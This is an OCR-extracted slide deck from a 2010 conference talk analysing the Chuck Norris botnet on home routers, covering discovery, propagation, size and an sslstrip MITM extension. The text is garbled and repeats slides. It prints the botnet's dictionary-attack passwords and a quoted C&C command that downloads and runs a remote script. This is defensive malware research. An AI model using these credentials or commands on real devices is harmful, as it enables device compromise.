Embedded Malware - An Analysis of the Chuck Norris Botnet
P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar
{celedaI vykopal|drasar}@ics.muni.cz, radek.krej ci@mail.muni.cz
tJMli ®csikt-mu
The sixth European Conference on Computer Network Defense — EC2ND 28-29 October 2010, Berlin, Germany
Part I
Botnet Discovery
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
2/22
o Client-side anti-* protection is used and well known.
o Client-side anti-* protection is used and well known, o What could happen if we attack infrastructure?
FlowMon probe
FlowMon probe
FlowMon probe
Net Flow data generation
FlowMon probe
NetFlow data generation
NetFlow data collection
probe
NetFlow data generation
NetFlow data collection
NetFlow data analyses
o Worldwide TELNET scan attempts.
o Mostly comming from ADSL connections. h;can;   demoplugin   u;can;   sshattack   p2pdetect   dos   smiirf Event;				
				
				
| Sh=.*,.rt. || Show >» ».».«„„.„», |				
Alerts Time                               * Protocol* Source IP              * Destination IPs                                          * Destination Ports * Severity* Operations *				
2009-12-14 00:04:18.244       TCP                     190.43.54.116 O 147 2009-12-14 00:04:26.379 147 147 147	251 251 251 251	52 52 52 52	1, 147.25 12, 147.2 23, 147.2 28 and o	1.52.10, 147.251.52.11,       23                               0                   | Ful RopOlt 51.52.13, 147.251.52.22, 51.52.26, 147.251.52.27, her 43 IPs
2009-12-14 00:04:18.253       TCP                     190.43.54.116 O 147 2009-12-14 00:04:29.356 147 147 147	251 251 251 251	52 52 52 52	2, 147.25 5, 147.25 8, 147.25	1.52.3, 147.251.52.4,           23                               0                   1 Ful Report 1.52.6, 147.251.52.7, 1.52.9, 147.251.52.15, her 188 IPs
2009-12-14 00:08:13.738       TCP                       87.16.90.222 O 147 2009-12-14 00:08:21.863 147 147 147	251 251 251 251	94 94 94 94	1, 147.25 4, 147.2E 7, 147.25 10 and o	1.94.2,147.251.94.3,           23                               0                   | Ful Report 1.94.5, 147.251.94.6, 1.94.8, 147.251.94.9, her 237 IPs
2009-12-14 00:16:11.771        TCP                       122.160.7.65 O 147 2009-12-14 00:16:11.802 147 147 147	251 2:51 251 251	0.1, 147.251 0.4, 147.251 0.7, 147.251 0.10 and ot		0.2, 147.251.0.3,           22                      o             f~Ful Report 0.5, 147.251.0.6, 0.8, 147.251.0.9, er 102 IPs
2009-12-14 00:14:36.584       TCP                 190.232.138.125 © 147 2009-12-14 00:14:51.047 147 147 147	251 251 251 251	64.1, 147.25 64.4, 147.25 64.7, 147.25 64.10 and o		1.64.2,147.251.64.3,           23                               0                   | Ful Report 1.64.5, 147.251.64.6, 1.64.8, 147.251.64.9, her 241 IPs
Part II
Chuck Norris Botnet
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
7/22
Chuck Norris Botnet in a Nutshell
o Linux malware - IRC bots with central C&C servers. 0 Attacks poorly-configured Linux MIPSEL devices, o Vulnerable devices - ADSL modems and routers.
o Uses TELNET brute force attack as infection vector, o Users are not aware about the malicious activities, o Missing anti-malware solution to detect it.
Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R] anger Killato :    in nome di Chuck Norris !
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
8/22
Monitoring of the Botnet
P. Čeleda et al
Botnet infiltration used from 12/2009 to 02/2010.
Embedded Malware - An Analysis of the Chuck Norris Botnet
9/22
Botnet infiltration used from 12/2009 to 02/2010.
Botnet infiltration used from 12/2009 to 02/2010
ASUS WL-500gP (agent-provocateur)
Botnet infiltration used from 12/2009 to 02/2010.
ASUS WL-500gP (agent-provocateur)
Botnet infiltration used from 12/2009 to 02/2010.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
10 / 22
11 list of C class J   networks to scan
IP Range	Owner	IP Range	Owner
217.236.0.0/16	Deutsche Telekom	88.253.0.0/16	TurkTelekom
87.22.0.0/16	Telecom Italia	220.240.0.0/16	Comindico Australia
85.174.0.0/16	Volgograd Electro Svyaz	222.215.0.0/16	China Telecom
201.1.0.0/16	Telecomunicacoes de Sao Paulo	200.121.0.0/16	Telefonica del Peru
Table 1: Example of botnet propagation targets.
IP Range	Owner	IP Range	Owner
217.236.0.0/16	Deutsche Telekom	88.253.0.0/16	TurkTelekom
87.22.0.0/16	Telecom Italia	220.240.0.0/16	Comindico Australia
85.174.0.0/16	Volgograd Electro Svyaz	222.215.0.0/16	China Telecom
201.1.0.0/16	Telecomunicacoes de Sao Paulo	200.121.0.0/16	Telefonica del Peru
Table 1: Example of botnet propagation targets.
IP Range	Owner	IP Range	Owner
217.236.0.0/16	Deutsche Telekom	88.253.0.0/16	TurkTelekom
87.22.0.0/16	Telecom Italia	220.240.0.0/16	Comindico Australia
85.174.0.0/16	Volgograd Electro Svyaz	222.215.0.0/16	China Telecom
201.1.0.0/16	Telecomunicacoes de Sao Paulo	200.121.0.0/16	Telefonica del Peru
Table 1: Example of botnet propagation targets.
infected victim device
TELNET service dictionary attack
victim
User Password
rQQi        admin, Admin, password, root, 1234, private, XAlbacOMX, adsll234, %%fuckinside%%, dreambox, blank password
admin admin, password, blank password
1234 1234Admin
Table 2: Passwords used for a dictionary attack.
TELNET service dictionary attack -►
download current bot version
infected device
victim
admin, Admin, password, root, 1234, private, XAlbacOMX, ads!1234, %%fuckinside%%, dreambox, blank password
admin, password, blank password
Table 2: Passwords used fo
:tionary attack.
bat
deny remote access (ports 22-80)
infected device
deny remote access (ports 22-80)
infected device
bat
deny remote access (ports 22-80)
infected device
l.join ##soldiers##
2. Topic: !* init-cmd (get scan-tools)
1
c&c
(IRC)
server
Initial Command (IRC Topic):
:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
Initial Command (IRC Topic):
:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh
Botnet Threats
o Denial-of-Service attacks - DoS, DDoS.
o DNS spoofing attack.
o Infected device reconfiguration.
t <
Consequences for Users
o The link was saturated with malicious traffic activities.
o Economic losses and criminal sanctions against unaware users.
DNS Spoofing Attack
o Web page redirect:
o www.facebook.com o www.google.com
o Malicious code execution.
t 1
primary secondary DNS server ,     DNS server
infected router
DNS Spoofing Attack
o Web page redirect:
o www.facebook.com o www.google.com
o Malicious code execution.
botnet C&C Center OpenDNS.com
t 1
primary secondary DNS server ,     DNS server
infected router
\
www.facebook.com
DNS Spoofing Attack
o Web page redirect:
o www.facebook.com o www.google.com
o Malicious code execution.
botnet C&C Center OpenDNS.com
DNS Spoofing Attack
o Web page redirect:
o www.facebook.com o www.google.com
o Malicious code execution.
botnet C&C Center      OpenDNS.com www.li
Botnet Size and Evaluation - I
o Size estimation based on NetFlow
data from Masaryk University.
o 33000 unique attackers (infected devices) from 10/2009 - 02/2010.
Most Infected ISPs
Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
Mat 1 Apt i
Unique attackers targeting the MU network
Month	Min	Max	Avr	Mdn
October	0	854	502	621
November	41	628	241	136
December	69	1321	366	325
January	9	1467	312	137
February	180	2004	670	560
Total	0	2004	414	354
Botnet stopped activity on 23 February 2010.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
15 / 22
Botnet Size and Evaluation - I
o Size estimation based on NetFlow
data from Masaryk University.
o 33000 unique attackers (infected devices) from 10/2009 - 02/2010.
Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mat 1 Apt 1
Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
Unique attackers targeting the MU network
Month	Min	Max	Avr	Mdn
October	0	854	502	621
November	41	628	241	136
December	69	1321	366	325
January	9	1467	312	137
February	180	2004	670	560
Total	0	2004	414	354
Botnet stopped activity on 23 February 2010.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
15 / 22
Botnet Size and Evaluation - I
o Size estimation based on NetFlow
data from Masaryk University.
o 33000 unique attackers (infected devices) from 10/2009 - 02/2010.
Oct 1 Nov 1 Dec 1 Jan 1 Feb 1 Mat 1 Apt 1
Telefonica del Peru Global Village Telecom (Brazil) Turk Telecom Pakistan Telecommunication Company China Unicom Hebei Province Network
Unique attackers targeting the MU network
Month	Min	Max	Avr	Mdn
October	0	854	502	621
November	41	628	241	136
December	69	1321	366	325
January	9	1467	312	137
February	180	2004	670	560
Total	0	2004	414	354
Botnet stopped activity on 23 February 2010.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
15 / 22
Botnet Size and Evaluation - II
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
16 / 22
Part III
Beoynd Chuck Norris Botnet
P. Celeda et al. Embedded Ma I ware - An Analysis of the Chuck Norris Botnet 17 / 22
Attacks on HTTPS using Chuck Norris Botnet - I
Features
o Our extension to Chuck Norris Botnet.
o Based on MITM (Man-ln-The-Middle) attack presented by Moxie Marlinspike at Black Hat DC (02/2009).
o Infected host operates as transparent HTTP proxy.
o We don't attack HTTPS directly (invalid certificates).
Vulnerable Systems
o Any site providing HTTP —> HTTPS redirect, o Can't be detected on web server side, o No invalid certificates on client side.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
18 / 22
web service
https://mail.google.com
access point
(mitm - sslstrip)
user
8 6.49.xxx.yyy
MITM attack using sslstrip tool and infected host.
web service access point user
https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy
GET HTTP mail.google.com
MITM attack using sslstrip tool and infected host.
web service access point user
https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy
GET HTTP mail.google.com
HTTP 301 Moved Perm; https://mail.google.c
(0,0) m
http://mail.google.com
MITM attack using sslstrip tool and infected host.
web service access point user
https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy
GET HTTP mail.google.com
HTTP 301 Moved Perm; https://mail.google.c
■<-
(0,0) m
http://mail.google.com ^ ,~fg£2 HTTP mail.google.com
SSL mail.google.
MITM attack using sslstrip tool and infected host.
web service access point user
https://mail.google.com (mitm - Sslstrip) 86 .49 . xxx .yyy
GET HTTP mail.google.com
„™_   ((«,»)) _
https://mail.google.com http://mail.google.com
^H^^ GET HTTP mail.google.com
SSL mail.google.com Client hello    ' GET HTTP mail.google.
SSL Server hello _
HTTP 200 OK
MITM attack using sslstrip tool and infected host.
Part IV
Conclusion
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
20 / 22
Conclusion
Botnet Timeline
o Compilation timestamp in pnscan tool - 4.7.2008.
o First file uploaded to distribution servers - 19.5.2009.
o Botnet discovery at Masaryk University - 2.12.2009.
a Botnet shutdown (hibernation) - 23.2.2010
Botnet Summary
o There are not anti-* solutions for embedded/SoHo devices, o Based on known techniques and components from Internet, o Users are not aware about the attack or device infection, o No response and collaboration from infected networks.
P. Celeda et al.
Embedded Malware - An Analysis of the Chuck Norris Botnet
21 / 22
Pavel Celeda et al.
celeda@ics.muni.cz
Project CYBER
http://www.muni.cz/ics/cyber
Embedded Malware - An Analysis of the Chuck Norris Botnet
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.